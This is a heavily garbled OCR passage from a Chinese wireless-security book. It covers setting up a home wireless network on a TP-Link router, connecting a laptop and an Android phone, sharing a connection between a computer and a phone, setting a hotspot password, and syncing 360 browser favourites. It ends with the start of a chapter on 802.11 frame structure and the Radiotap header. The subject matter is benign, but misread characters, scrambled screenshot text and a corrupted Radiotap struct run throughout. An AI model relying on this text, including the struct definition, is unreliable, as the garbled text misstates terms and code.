1999 年 ， 当 时 的 名 称 叫 作 Wireless Ethernet 
Compatibility Alliance (WECA)， 在 2002 年 
10 月 ， 正 式 改 名 为 WiFi Alliance。 

以 前 通过 网 线 连 接 计 算 机 ， 目 从 有 了 
WiFi 技 术 ， 则 可 以 通过 无 线 电 波 来 联网 ; 
常见 的 无 线 网 络 设备 就 是 一 个 无 线路 由 
髓 ， 那 么 在 这 个 无 线路 由 器 的 电波 覆盖 的 
有 效 范围 内 ， 都 可 以 采用 WiFi 连 接 方 式 进 
行 联网 ， 如 果 无 线路 由 器 连接 了 一 条 ADSL 
线路 或 者 别 的 上 网 线路 ， 则 无 线路 由 器 叉 
可 以 被 称 为 一 个 “热点 ”。 


5.2 组 建 一 个 简单 的 无 线 网 络 


无 线 局 域 网 络 的 搭建 给 无 线 办 公 市 来 
了 很 多 方便 ， 而 且 可 随意 改变 办 公 位 置 而 
不 受 束缚 ， 大 大 适合 了 现代 人 的 追求 。 


(3) 无 线 介 质 。IEEE 802.11 标准 以 无 
线 介 质 (Wireless medium) 在 工作 站 之 间 
传递 数据 帧 。 其 所 定义 的 物理 层 不 止 一 种 ; 


5.2.1 搭建 无 线 网 环境 a 


建立 无 线 局 域 网 的 操作 比较 简单 ， 在 评语 


了 


这 种 架构 允许 多 种 物理 层 同 时 支持 802.11 
MAC - 802.11 最 初 标 准 化 了 的 两 种 射频 
(radio frequency， 人 简称 RF) 物理 层 以 及 一 
种 红外 线 (infrared ) 物理 层 ， 然 而 事后 证 
明 RF 物理 层 较 受 欢迎 。 

(4) 分 布 式 系统 。 当 几 个 接 入 点 串联 
以 覆盖 较 大 区 域 时 ， 彼 此 之 间 必 须 相 互通 
信 ， 才 能 够 掌握 移动 式 工作 站 的 行 踩 。 
而 分 布 式 系 统 (distribution system) 属于 
802.11 的 逻辑 元 件 ， 负 责 将 帧 〈frame) 转 
送 至 目的 地 。 


5.1.4 ”认识 无 线 连接 方式 


说 起 WiFi 大 家 都 知道 可 以 无 线 上 网 ， 
其 实 ，WiFi 是 一 种 无 线 连接 方式 ， 并 不 是 
无 线 网 络 或 者 是 其 他 无 线 设 备 。 

WiFi 是 一 个 无 线 网 络 通信 技术 的 品 
牌 ， 由 WiFi 联 盟 (WiFi Alliance) 所 持 有 。 
目的 在 于 改善 基于 IEEE 802.11 标 准 的 无 线 


有 线 网 络 到 户 后 ， 用 户 只 须 连接 一 个 具有 
无 线 WiFi 功 能 的 路 由 器 ， 然 后 各 房间 里 的 
计算 机 、 笔 记 本 计算 机 、 手 机 和 iPad 等 设 
备 利 用 无 线 网 卡 与 路 由 髓 之 间 建 立 无 线 连 
接 ， 即 可 构建 整个 办 公 室 的 内 部 无 线 局 域 
网 ， 下 图 为 一 个 无 线 局 域 网 连接 示意 图 。 


ADSL/CABEL 


4 = 


六 ，， 


安装 无 线 网 卡 的 
笔记 本 计算 机 一 
ed 


CC 
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=， 黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


sp 5.2.2 ”配置 无 线 局 域 网 单 击 “确认 ”按钮 ， 即 可 进入 路 由 器 
从 A 三 


”线路 由 器 ， 默 认 情 况 下 ， 具 有 无 线 功 能 的 
路 由 器 不 开启 无 线 功 能 ， 需 要 用 户 手动 配 
置 ， 在 开启 了 路 由 器 的 无 线 功能 后 ， 下 面 
就 可 以 配置 无 线 网 了 。 

使 用 计算 机 配置 无 线 网 的 操作 步 又 
如 下 。 
打开 IE 浏览 器 ， 在 地 址 栏 中 输入 路 
由 器 的 网 址 ， 一 般 情 况 下 路 由 器 的 默认 
网 址 为 “192.168.0.1”， 输 入 完毕 后 单 去 
“ 转 至 ”按钮 ， 即 可 打开 路 由 器 的 登录 窗 
口 ， 如 下 图 所 示 。 


回 TLWR835N 


X 四 
= :了 | 19216801 


sp 图 在 “请 输入 管理 员 密码 ”文本 框 中 输 
入 管理 员 的 密码 ， 默 认 情 况 下 管理 员 的 密 
码 为 “123456”， 如 下 图 所 示 。 


x 
:二 3 | 19216801 


加 TL-WR885N 


TP-DINIK 


博 输入 管理 员 密码 


琶 记 窗 码 了 
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全。 建立 无 线 局 域 网 的 第 一 步 就 是 配置 无 ”的 “运行 状态 ”工作 界面 ， 在 其 中 可 以 查 


看 路 由 器 的 基本 信息 ， 如 下 图 所 示 。 


x 四 
和 全 OO | 1sz16aol 


四 TLWR885N 


TP-LINIK | 一 一 SN 天 疆 谏 率 二 与 现 无 线 自 由 连 概 区 才 


Fe sb 


选择 窗口 左 侧 的 “无 线 设置 ” 选 
项 ， 在 打开 的 子 选 项 中 选择 “基本 信息 ” 
选项 ， 即 可 在 右 侧 的 窗 格 中 显示 无 线 设 置 
的 基本 功能 ， 并 选中 “开始 无 线 功 能 ”和 
“开局 SSID 广 播 ” 复 选 框 ， 如 下 图 所 示 。 


x 丑 


192.168,0.1 


加 TL-WR885RN 


< 0 


jh 态 呆 


当 开 启 了 路 由 器 的 无 线 功 能 后 ， 单 击 

“保存 ”按钮 进行 保存 ， 然 后 重新 启动 路 
由 器 ， 即 可 完成 无 线 网 的 设置 ， 这 样 具有 
WiFi 功 能 的 电子 设备 就 可 以 与 路 由 器 进行 
无 线 连 接 ， 从 而 实现 共享 上 网 。 


5.2.3 将 计算 机 接 入 无 线 网 


笔记 本 计算 机 具有 无 线 接 入 功能 ， 人 台式 
计算 机 要 想 接 入 无 线 网 ， 需 要 购买 相应 的 无 


线 接收 器 ， 这 里 以 笔记 本 计算 机 为 例 ， 介 绍 
如 何 将 计算 机 接 入 无 线 网 ， 具 体 的 操作 步骤 
如 下 。 

双击 笔记 本 计算 机 桌面 右 下角 的 无 
线 连接 图 标 ， 打 开 “ 网 络 和 共享 中 心 ” 窗 
口 ， 在 其 中 可 以 看 到 计算 机 的 网 络 连 接 状 
态 ， 如 下 图 所 示 。 


| 党 网 洛 和 共享 中 心 = 
个 尝 < 网 络 和 Inte..，> 网 将 和 共享 中 心 v ie ” 
查看 其 本 网 络 信息 并 设置 连 
拉 淹 面 斤 主页 查看 基本 网 络 信息 并 设置 连接 
适配器 笃 寺 活动 网 络 
5 本 
ee 你 县 前 溉 有 连接 到 任何 网 络 。 
区 高 级 共享 设置 
更 改 网 络 设 置 


i 设 王 新:t 寺 接 吕 网 首 

设 嘻 完 帝 、 接 SS 或 VPN 注 接 ; 或 设 辐 路 自 基 或 渤 入 襄 ， 
[ 鳃 “ 问 征 兹 难 解答 

诊 新 并 修复 网 洛 癌 昨 ， 或 埋 节 得 缀 准 解答 信息. 


Windows 防火 培 
未 工 组 


单 击 笔记 本 计算 机 桌面 右 下 角 的 无 线 
连接 图 标 ， 在 打开 的 界面 中 显示 了 计算 机 
自动 搜索 的 无 线 设备 和 信号 状态 ， 如 下 图 
所 示 。 


666666 


gh 


family 


fhpre-HSTT 
”安全 


TP-LINK1 
四 安全 


TP-LINK 6666 
”安全 


agou 


单 击 一 个 无 线 连接 设备 ， 展 开 无 线 
连接 功能 ， 在 其 中 选中 “自动 连接 ” 复 选 
框 ， 单 去“ 连接” 按钮 ， 如 下 图 所 示 。 


ChinaNet-H5TF 
安全 


family 


TP-LINKIT1 
网 7 自动 连接 
i 壬 接 


TP-LINK 6666 


ee 
> 于 


在 打开 的 界面 中 输入 无 线 连接 设备 的 
连接 密码 ， 单 击 “ 下 一 步 ” 按 钮 ， 如 下 图 
所 本 Oo 


mywifi 
a =p 
Hb66666 


ChinaNet-H5TF 
' TE 


family 


TP-LINK1 
| 一 


输入 网 络 安 全 密 角 


RS 


图 与 我 的 联系 人 共享 网 络 


开始 连接 网 络 ， 如 下 图 所 示 。 


TP-LINK1 


本 te 


mywifi 


连接 到 网 络 之 后 ， 桌 面 右 下 角 的 无 线 
连接 设备 显示 正常 ， 并 以 弧 线 的 方法 给 出 
信号 的 强 弱 ， 如 下 图 所 示 。 
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组 建 无 线 安全 网 络 


二 黑客 攻防 与 无 线 受 全 从 新 手 到 高 手 ( 超 值 版 ) 


再 次 打开 网 络 和 共享 中 心 窗 亡 9 下 和 245 区 :这 中 国电 依 CBB 56% 
在 其 中 可 以 看 到 计算 机 当前 的 连接 状态 ， a 
如 下 图 所 示 。 


各 网 络 和 共享 中 心 - DO x ChinaNet-H5TF 
个 党 “ 网 络 和 .，、 网 阁 和 共享 中 心 ~ 已。 选 款 洼 唱 面板 六 
i ep TP-LINK1 8 和 瓜 
控制 面板 主页 查看 基本 网 络 信息 并 设置 连接 
查 帮 活动 网 阁 TP-LINK2 8 气 
ee 沪 同 类 型 Internet 
EE - ern 
豆 改 育 级 共享 设置 ei 过 这 WLAN TP-LINK_38F156 
(TP-LINK1) 
TP-LINK_6666 自 三 
更 改 网 络 设 娃 
i 设置 新 的 连接 或 网 络 fhpre-H5TF 
没 辕 完 带 、 抄 号 或 VPN 这 接 ; 或 设置 路 白露 或 接 入 忘 。 
mywifi 8 会 
-| 问 是 归 洽 解答 
诊断 并 修复 网 络 问题 ， 或 者 获得 疑难 解答 信息 。 © 
另 请 枯 阅 
Re 使 用 手指 点 按 可 用 的 WLAN， 弹 出 连接 
Ee 界面 ， 在 其 中 输入 相关 密码 ， 如 下 图 所 示 。 


Se 无 线 局 域 网 配置 完成 后 ， 用 户 可 以 将 i 
手机 接 入 WiFi， 从 而 实现 无 线 上 网 ， 这 里 ..... 

以 Android 系 统 为 例 演示 手机 接 入 WiFi 具 体 

操作 步骤 如 下 。 


回 | 
在 手机 界面 中 用 手指 点 按 “ 设 置 ” 
图 标 ， 进 入 手机 的 “设置 ” 界面， 如 下 图 ellela lll lole 


alslolrlelnlslx[: 
所 示 。 
elzlxlclvlelvIv ke 
下 午 2:44 名 “和 中 国电 信 57% 
a a 


络 和 庄 扩 点 按 “ 连 接 ” 按 钮 ， 即 可 将 手机 接 入 

@ 移动 网 络 WiFi， 并 在 下 方 显示 “已 连接 ”字样 ， 这 

Dw 样 手机 就 接 入 了 WiFi， 然 后 就 可 以 使 用 手 
机 进行 上 网 了 ， 如 下 图 所 示 。 


合 蓝牙 已 关闭 

下 午 2:45 9.52KIs 筷 宁 站 中 国电 信 Ci 56% 
加 其 他 连接 方式 ey 

开启 WLAN Ea 
@ 通知 和 状态 栏 

TP-LINK1 a 
个 壁纸 
人 @ 个 性 主题 

ChinaNet-H5TF 
@ 字体 默认 TP-LINK2 8 二 
6 上 直 十 小 坛 业 fhpre-H5TF a 


使 用 手指 点 按 WLAN 右 侧 的 “已 关 mywf 。 
闭 ”， 开 启 手机 WLAN 功 能 ， 并 自动 搜索 i 
周围 可 用 的 WLAN， 如 下 图 所 示 。 = 
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5.3 “计算 机 和 手机 共享 无 线 上 网 


随 独 手机 上 网 的 普及 ， 计 算 机 和 手机 的 
网 络 是 可 以 互相 共享 的 ， 这 在 一 定 程度 上 方 
便 了 用 户 ， 例 如 ， 如 果 手 机 共享 计算 机 的 网 
络 ， 则 可 以 节省 手机 上 网 产生 的 流量 费用 ; 
如 果 目 己 的 计算 机 不 在 有 线 网 络 环 境 中 ， 则 
可 以 利用 手机 的 流量 进行 计算 机 上 网 。 


5.3.1 手机 共享 计算 机 的 网 络 


计算 机 和 手机 网 络 的 共享 需要 借助 
第 三 方 软件 ， 这 样 可 以 使 整个 操作 简单 
方便 ， 这 里 以 借助 “360 免 费 WiFi” 软 件 
为 例 进行 介绍 。 
将 计算 机 接 入 WiFi 环 境 当 中 ， 如 下 图 
所 示 。 


党 网 络 和 共享 中 心 一 口 X 
个 和 尝 * 网 洛 和 .，》， 网 阁 和 过 到 二 / 心 ve 探索 控制 两 板 D 
从 本 网 络 位 记 闪 记 且 诺 
控制 面板 主页 查看 基本 网 络 信 息 并 设置 连接 
理 知 洁 动 网 治 
更 玖 运 醒 各 设 吾 
更 改 高 级 共 享 误 豆 TP-UNK1 os 
公用 网 洛 这 接 ; 1 由 WLAN 
8 [TP-LINKT) 
豆 戊 网 治 论 全 
入: 设 豆 新 的 这 接 或 网 泛 
设 辣 荣 击 ， 接 己 或 YPN 迹 投 ; 或 设 诗 路 宇 放 或 报 入 点 。 
到 | 问 是 这 难 音 答 
诊 新 并 停 乞 网 洛 问 是 ， 或 大 获得 疑 准 巡 答 舍 已 。 
Internet 先世 
Windows 防火 坛 
京 话 组 


在 计算 机 中 安装 “360 免 费 WiFi” 
软件 ， 然 后 打开 其 工作 界面 ， 在 其 中 设置 
WiFi 名 称 与 竹 码 ， 如 下 图 所 示 。 


习 巨 口 负 玫 WiFi 


安全 防护 中 


WiFi 已 开启 ， 快 拿手 机 连 幸 吧 


WiFi 包 称 LB-LINK'T 


WiFi 密 码 : 66396639 稀 落 密码 


会 ”WiFi 信息 :三 已 连接 的 手机 


第 5 章 ”组 建 无 线 安全 网 络 
打开 手机 的 WLAN 搜 索 功能 ， 可 以 看 
LINK1， 如 下 图 所 示 。 


Es 


TP-LINKI1 


LB-LINK] 
mywifl 
ChinaNet-HSTF 
family 


agou 


1P-LINK_99DA 


MERCURY_42952A 


使 用 手指 点 按 LB-LINK1， 即 可 打开 
WiFi 连 接 界 面 ， 在 其 中 输入 密码 ， 如 下 图 
所 示 。 


强 


WPA2 PSK 


点 按 “ 连 接 ” 按 钮 ， 手 机 就 可 以 通过 
计算 机 发 射出 来 的 WiFi 信 号 进行 上 网 了 ， 
如 下 图 所 示 。 


LB-LINKIT 


mywifi 
2 用 
TP-LINK_99DA 


TP-LINK_6666 
bbbbpbb 
这 WPAA 
ChinaNet-GTY7 
ChinaNet-JCPb 


综 可 用 


Tenda_1BF8F0 


4] 


DD.3.2 


黑客 攻防 与 无 线 巡 全 从 新 手 到 高 手 ( 超 值 版 ) 


返回 到 计算 机 工作 环境 当中 ， 在 

“360 免 费 WiFi” 的 工作 界面 中 选择 “已 经 
连接 的 手机 ”选项 卡 ， 则 可 以 在 打开 的 界 
面 中 查看 通过 此 计算 机 上 网 的 手机 信息 ， 
如 下 图 所 示 。 


习 扎 口 洛 费 WiFi 


1 台 手 机 安全 上 网 中 ， 无 人 蹦 网 


共同 华为 C8815 
Se 0.00KB/s 


国 发 文字 98 装 软 件 ® 


BE 玩 游戏 


:三 已 连接 的 手机 


计算 机 共享 手机 的 网 络 


手机 可 以 共享 计算 机 的 网 络 ， 计 算 机 也 可 

以 共享 手机 的 网 络 ， 这 里 以 Android 手 机 为 例 
演示 手机 共享 网 络 ， 有 具体 的 操作 步骤 如 下 。 
seep 回 打开 手机 ， 进 入 手机 的 设置 界面 ， 
在 其 中 使 用 手指 点 按 “ 便 携 式 WLAN 热 
点 ”， 开 启 手 机 的 便携 式 WLAN 热 点 功 
能 ， 如 下 图 所 示 。 


‘ 


便携 式 WLAN 热点 


[step 图 返回 到 计算 机 的 操作 界面 ， 单 击 右 
下 角 的 无 线 连 接 图 标 ， 在 打开 的 界面 中 显 
示 了 计算 机 自动 搜索 的 无 线 设 备 和 信号 状 
态 ， 这 里 就 可 以 看 到 手机 的 无 线 设备 信息 
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“HUAWEI C8815”， 如 下 图 所 示 。 


= HUAWEFI C8815 


6666566 


单 击 手机 无 线 设备 ， 即 可 打开 其 连接 
界面 ， 如 下 图 所 示 。 


DY Cc 
大 i .8815 


其 他 人 可 能 会 看 到 你 通过 此 网 络 发 送 的 信息 
图 自动 引流 


单 击 “ 连 接 ” 按 钮 ， 将 计算 机 通过 手 
机 设备 连接 网 络 ， 如 下 图 所 示 。 


mywifi 
”安全 
HUAV/E| C8815 


正在 连接 


连接 成 功 后 ， 在 手机 设备 下 方 显 示 
“已 连接 ， 开 放 ” 信 息 ， 其 中 的 “开放 ” 
表示 该 手机 设备 没有 进行 加 密 处 理 ， 如 下 
图 所 示 。 


2 HUAWEIC8815 
” 已 连接 ， 开 放 
TP-LINK] 


4 < 3 


6b66666 
” 安全 


侈 提示 : 至 此 ， 就 完成 了 计算 机 通过 手机 


上 网 的 操作 ， 这 里 需要 注意 的 是 一 定 要 时 


刻 关 注 手 机 的 上 网 流量 。 


5.4 ”实战 演练 


功能 
为 保证 手机 的 安全 ， 一 般 需 要 给 手机 


的 WLAN 热 点 功能 添加 密码 ， 具 体 的 操作 
icaeg 

在 手机 的 移动 热点 设置 界面 中 ， 点 按 
ee 点 ”功能 ， 在 弹出 的 界面 
中 点 按 “ 开 放 ” 选 项 ， 可 以 选择 手机 设备 
的 加 黎 方 式 ， 如 下 图 所 示 。 


2 SS| 


HUAWEI C8815 


开放 


WPA PSK 


WPA2 PSK 


选择 好 加 密 方式 后 ， 即 可 在 下 方 显示 
密码 输入 框 ， 在 其 中 输入 密码 ， 然 后 单 击 
“保存 ”按钮 即 可 ， 如 下 图 所 示 。 


HUAWEI C8815 


WPA PSK 


加 密 完 成 后 ， 使 用 计算 机 连接 手机 设 
备 时 ， 系 统 提 示 用 户 输入 网 络 安全 密 钥 ， 
如 下 图 所 示 。 
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/后 dt C8815 


输入 网 络 安全 窗 钥 


国 与 我 的 联系 人 共享 网 络 


下 一 步 取消 


实战 演 
到 手机 

使 用 360 安 全 浏览 器 可 以 将 计算 机 收藏 
夹 中 的 网 址 同步 到 手机 当中 ， 其 中 360 安 全 
浏览 器 的 版 本 要 求 在 7.0 以 上 ， 具 体 的 操作 
步 又 如 下 。 


在 计算 机 中 打开 360 安 全 浏览 器 8.1， 
如 下 图 所 示 o 


练 2 一 一 将 计算 机 收藏 夹 网 址 同步 


0 安全 济 [ 责 十 8 言 震 ”要 营 工具 曾 一 口 
C 分 1360 导航 | 证 | 名 https 360.cn 如 多 总 Q 
~ 口 盾 人 要 凉 夫 门 谷 哉 赴 网 二 大 全 两 游 戏 中 心 站 |Links 鹃 扩展 ” .月 登录 管家 
I》 | 外 | 日 短 后 浏 疙 | 转 360 纯 前 新 一 代 去 全 上 网 导航 + = 
设 360 写 腕 为 主 古 会 N 
3 co 人 有 晴 -3~-20°C 明日 
里 EO 这 | L ee @®w) 无 持 坚 风向 : 视 风 (ew) -2~-1 


困 汪 7 辣 礼 知 网 片 言 乐 山寺 地 周 问 管 


Google 


新 性 地 械 ”从 各 ”电视 昧 座 。” 淘宝 加 财 ”再度 癌 泉 ”再度 去 


睛 我 的 主页 | 阳新 闻 头 条 ; 加 电 视 剧 : 固 最 新 电影 网 小 游戏 关 小 说 大 : 


国 新 间 ,视频 ”名 电影 ' 电视剧 好 技 。 360 商 城 莉 良 。 答 博 岂 天 桨 . 情 先 


局 购物 . 海 淘 ”人 @ 彩 亚 ,理财 360 谐 水 淘宝 癌 网 上 购 网 
55 :一 ceNE KZ2 上 | EE 
@ 活期 其 全 ef | 小 识 ' 旅 游 淘 三 心 3 计 洛 加 | 区 划 二 
4 
今 () 今 日 直 擅 ” 口 器 研 浏 芝 。 饼 交加 时 蜂 下载 巴 冬 口 41》 


单 击 工作 界面 左上 角 的 浏览 器 标志 ， 
在 弹出 的 界面 中 单 击 “ 登 录 账 号 ”按钮 
如 下 图 所 示 。 


- 


去 香 妆 藏 工具 在 助 | 前 | 一 | 口 
© ps 60.cn 礼 乡 YY 心 Q 
未 登 示 交游 戏 中 心 站 Linl 中 扩 晨 登录 管家 
| i 全 上 网 导航 + Fr 和 
兴 肝 浏 蛤 我 的 帐号 
i N 
澡 OO | P 全) 仿 上 量 20°C 明 昌 
: Cx . 开 持 综 风 向 : 神 风 
签 昼 匠 荣 ~ 人 中 心 
科 国 ”视频 ”向 片 ” 育 秆 大 ”地 图 1 
人 | Fw 
已 
| 交 村。 花 八 ” 电 视 底座” 湖 宝 ， 黄 妆 。 百度 当 乐 ” 忆 度 
积分 商城 我 的 放流 
! ] 最 新 电影 阳 小 游戏 关 小 说 大 : 
画 风 利 “ 广 淹 一 呵 彩 党 "地 叮 60 诺 戏 淘宝 癌 网 上 购物 
A SR > ,有 有 Ly FNS 中 | 加 
全 活 妥 .基金 。 如 小 说 ,旅游 OP ail 
4 
人 他 今明 直 柱 。 唱 甘于 小 吉 岂 交加 要 由 T 载 天 各 口 4 


弹出 “登录 360 账 号 ”对 话 框 ， 在 其 
ea 如 下 图 所 示 。 
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黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


| go 3000 人 EN > 文件 吉 直 履 训 工具 大助 | 重 | 一 | 口 | X 
© <| cl Xx 由 局 .猴子 过头 Q 
登录 360 帐 号 外 - 


EO Oe DS + 


您 站 项 ~ 口 扩展 ~ 加 室 录 到 家 
Il》 | @@O 日 和 局 


设 360 导 航 为 主页 国 --- 


[ 

大和 百度 音乐 百度 去 
舍 我 的 主页 卓 一 明 小 说 大 : 
国 新 闻 视频 网 天 洛 - 桂 选 
局 购物 :海光 网 上 风物 
@ 江阴 ,其 会 上 聚 划 算 -~ 
| 上 


| 弟 今 加 人 HE 大” 口 入 WX 二 区) 本 由 记 区 上 嚣 员 Ql1ox : 


侈 提示 : 如 果 没 有 账号 ， 则 可 以 单 击 “ 免 
费 注册 ”按钮 ， 在 打开 的 界面 中 输入 账号 
与 密码 进行 注册 操作 。 


免费 注册 360 帐 号 


了 
.上 


. 


[see 加 输入 完毕 后 ， 单 击 “ 登 录 ” 按 钮 ， 

即 可 以 会 员 的 方式 登录 到 360 安 全 浏览 器 当 
中 ， 单 击 浏览 器 左上 和 角 的 图 标 ， 在 弹出 的 
下 拉 列 表 中 单 击 “ 手 动 同步 ”按钮 ， 如 下 
图 所 示 。 


》 文件 查看 收 贡 JIR 帮助 | 曾 一 口 X 
vay ps; hao.360.cn 继 夕 v 名. 多 子 换 头 名 
EE 0 0" ~ 的 兽 过 中 心 站 Unks 六 ; 关 扩 晨 ” . 同 登 好 千家 
Lee x |+ 已 
跨 屏 浏览 Sek :mew x | 二 
窗 N 
人 Eu 
a |; Om @' 
“a 0] 无 拌 尝 FU 名: 笛 风 -2_19:C 
签 绚 抽奖 个 人 中 心 | 
新 闻 初 频 网上 音乐 窜 情 抽风 后 答 1 
芭 ” E | 
山 也 税 ” 花 盆 ”电视 奈 座 ” 淘 主 ” 莫 朗 百度 音乐 ”百度 云 召 
全 分 度 过 我 的 要 莫 | 
| : 国 最 新 电影 ”988 小 游戏 : 上 胃 小 培 大 全 
手动 同步 N 退出 登录 * 360 商 城 新 沪 : 微 博 也 于 洛 : 精 先 
类 风物 "光一 和 和 荣 了 捍 姥 一 1 =60 游 骏 淘宝 同 网 上 购物 
爱 淘 宝 © 350BS 视 聚 划 算 . 


© 活期 .基金 天 小 说 旅 涡 
本 


苗 今日 台 ) 今 日 言 克 日 徐 异 汶 丰 所 鸡 加 于 器 下 载 巴 外 


» 


OD qd Q100% .: 
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此 时 ， 可 将 计算 机 中 的 收藏 夹 进行 同 
步 操 作 ， 如 下 图 所 示 。 


@ ps 1a0 .360.cn 候 乡 v 吕 - 点 此 搜索 Q 


隐 落 戏 中 心 “Links 过 360 去 全 有 扩展 ” , 同 登 录 管 家 


EE O00 Com ~ | 
E < | 二 [ 
跨 屏 浏 览 8 由 S 。。 | i 
会 人 | 
一- fe \ 宁 4 请 -3~-20C 明 及 和 月 
此 Cam 也 ] 无 拌 仅 局 占 : 襟 风 ， (® -2~—19°C 和 二 : 
冬 尖 EE 疾 个 人 于 心 | 
| 新 闻 初 丘 网 H 音乐 沿 情 地 网 问答 购物 机 票 
ep -= 
CF 地 科 。 花 全 ”所 视 底 座 ” 淘 坟 英 朗 百代 音乐。 百 府 云 盘 脑 识 时 沿 
积分 雇 城 我 的 可 总 
到 ; 回 最 新 电影 ”0 小 游戏 贞 小 说 大 全 ” 瞪 旅游 度 
退出 登录 1 360 商 城 。 ”新 浪 * 微 十 。 轿 天 省 * 将 先 控 狐 ， 视 各 
放风 和 |") 到 入 并 演 " 捏 杂 5860 游戏 淘宝 网 网上 购物 白 度 * 热 技 
全 活 央 : 基 侈 。 到 小 场 .旅游 爱 淘 主 加 3608 宙 聚 划 彼 国美 在 线 
国 京东 商城 58 同城 洋 电 镍 纪 性 
四 湛 减 :小 游 杖 全 动漫。 自 播 交 园 京东 商城 58 同 城 六 平 洋 电 阅 世 沁 侍 沪 
GD 搞笑 . 解 楚 总 教育 . 度假 汽车 之 家 昂 车 网 本 平 评 汽车 灾 届 客 
玉 蚂 护 诺 游 人 民 ， 新 华 赶 竺 网 当当 网 _ 


局 查询 .至 认购 机 票 . 炎 丰盈 


» 


区 今日 特 志 ”而 好 换 y (©) 今日 直 看 口中 屏 浏览 后 疯 1 下 载 巴 区 OD dd) Q100% .: 


进入 手机 操作 环境 当中 ， 点 按 “360 
手机 浏览 器 ”图 标 ， 进 入 手机 360 浏 览 器 工 
作 界 面 ， 如 下 图 所 示 。 


搜索 或 输入 网 址 


选择 城市 C 天 气 获 取 失 败 


@ 搜索 关键 记 


新 闻 视频 


新 浪 


国 好 药 
[加 | 好 搜 


贺 搜狐 
四 百度 
园 淘宝 
携程 


国 赶集 ” 咬 唯 品 会 


最 第 访问 


人 @ 360 个 人 中 心 - 找 回 


守 360 手 机 抢 票 


® 生 


[step 罗 点 按 页 面 下 方 的 “三 ”按钮 ， 打 开 
手机 360 浏 览 器 的 设置 界面 ， 如 下 图 所 示 。 
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搜索 或 输入 网 址 


2、 得 入 用 户 名 /手机 号 /邮箱 


向 ”输入 密码 


收 蔬 夹 历史 


Cy 
国 
c 


设置 电脑 信息 下 载 退出 
= 合 [step 轩 在 登录 界面 输入 账号 与 密码 ， 这 里 需 


要 注意 的 是 ， 手 机 登录 的 账号 与 密码 与 计 
[图 点 按 “ 收 藏 类 ”图 标 ， 进 入 手机 360 | 算 机 登录 的 账号 与 密码 必须 一 致 ， 如 下 图 
浏览 器 的 “收藏 夹 ” 界 面 ， 如 下 图 所 示 。 i 


收藏 夹 'D) 


AS 


3 


没有 收藏 记录 
编辑 同步 单 击 “立即 登录 ”按钮 ， 即 可 以 会 
员 的 身份 登录 到 手机 360 浏 览 器 当中 ， 在 打 
点 按 “ 同 步 ”按钮 ， 打 开 “账号 登 。 开 的 界面 中 可 以 看 到 “计算 机 收藏 天” 选 
录 ” 界 面 ， 如 下 图 所 示 。 


项 ， 如 下 图 所 示 。 
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二， 黑客 攻防 与 无 线 受 全 从 新 手 到 高 手 ( 超 值 版 ) 


电脑 收藏 来 


电脑 收藏 夹 > 


编辑 同步 5.5 小 试 二 于 


点 按 “ 计 算 机 收藏 夹 ” 选 项 ， 即 可 打 
开 “ 计 算 机 收藏 夹 ” 操 作 界 面 ， 在 其 中 可 
以 看 到 计算 机 中 的 收藏 夹 的 网 址 信息 出 现 
在 手机 浏览 器 的 收藏 夹 当 中 ， 这 就 说 明 收 
藏 夹 网 址 同步 完成 ， 如 右 图 所 示 。 


练习 1: 组 建 一 个 简单 的 无 线 网 络 。 
练习 2: 将 手机 接 入 无 线 WiFi。 

练习 3: 手机 共享 计算 机 网 络 上 网 。 
练习 4: 计算 机 共享 手机 网 络 上 网 。 
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第 6 草 ”数据 帧 的 结构 与 加 密 原 理 


无 线 通信 中 ， 所 有 的 数据 都 是 通过 无 线 设 备 传送 数据 帧 完成 的 ， 所 以 学 习 无 线 数据 帧 的 


结构 以 及 无 线 通 信 的 加 密 原 理 ， 是 提高 无 线 安全 的 基础 。 本 草 介 
无 线 通信 的 加 黎 原理 ， 主 要 包括 数据 帧 、 控 制 帧 、 


6.1 数据 帧 


6.1.1 数据 帧 的 结构 


无 线 数 据 帧 的 结构 比较 复杂 ， 包 含 
了 很 多 数据 信息 ， 其 中 Radiotap 头 与 IEEE 
802.11 协 议 头 是 数据 帧 中 的 头 信息 ， 下 面 进 
行 详 细 介 绍 。 


1. Radiotap 头 


Radiotap 头 是 802.11 帧 注入 和 接收 的 事 
实 标 准 ， 所 以 在 研究 无 线 数据 帧 之 前 有 必 
要 了 解 一 下 Radiotap 头 。 

Radiotap 头 包含 了 信号 强度 、 噪 声 强 
度 、 人 信道、 时 间 惟 等 信息 。Radiotap 比 传 
统 的 Prism 或 AVS 头 更 有 灵活 性 ， 文 持 Ra- 
diotap 的 系统 较 多 ， 如 Linux、FreeBSD、 
NetBSD、OpenBSD， 还 有 Windows (和 需 
用 AirPcap) ， 三 家 可 以 根据 目 己 的 需要 和 定 
制 个 性 化 信息 ， 因 此 它 的 长 度 不 固定 。 

Radiotap 的 头 部 定义 如 下 : 


tLruct eeec80211l radiotap header 1 


UinLs tt It versions 

I st Eo og 
uncont it pad; 
WLC tt Tleny 

/* entire length */ 
了 二 于 于 下 汉王 TEDCegents 


/* fields present */ 


attribaEe (packedo on )ys 


主要 参数 介绍 如 下 : 


(1) it version。 表 示 版 本 号 ， 值 始终 


为 0。 
(2) it pad。 没 有 任何 使 用 价值 ， 仅 仅 
是 为 了 结构 体 对 齐 。 


绍 无 线 网 络 数据 帧 的 结构 与 
管理 帧 的 结构 以 及 无 线 通信 的 加 密 原 理 。 


(3) it len。 表 示 长 度 ， 包 括 了 Radio- 
Fe ee hogar 
恩 不 关心 ， 
IEEE 802.11 ee 宙 

(4) it present。 表示 Radiotap 数据 的 
位 掩 码 。Radiotap 的 数据 紧 跟 其 头 部 ， 当 其 
中 的 位 掩 码 为 tue 时 ， 表 示 有 对 应 的 数据 ， 
可 以 认为 每 一 比特 表示 一 种 类 型 。 比 如 bit5 
为 1 表示 有 通道 数据 ， 则 可 以 获取 到 信号 
强度 ， 反 之 是 没有 对 应 的 数据 。 因 此 ，Ra- 
diotap 的 长 度 其 实 是 不 固定 的 。 

Radiotap 头 通过 抓 包 软件 抓 出 来 的 信 
轧 ， 如 下 图 所 示 。 


» Frame 11: 34 bytes on wire (272 bits}, 34 bytes captured (272 bits) on interface 9 
- Radiotap Header vg, Lenogth 24 
Header revision: © 
Header pad: © 
Header length: 24 
~ Present flags 
上 Present flags word: 9xa609462e 
» Present flags word: 9x669098820 
Ee ags; Ox00 
ata Rate: 1.0 Mt 


enannel frequenoy: 2412 [BG 1] 
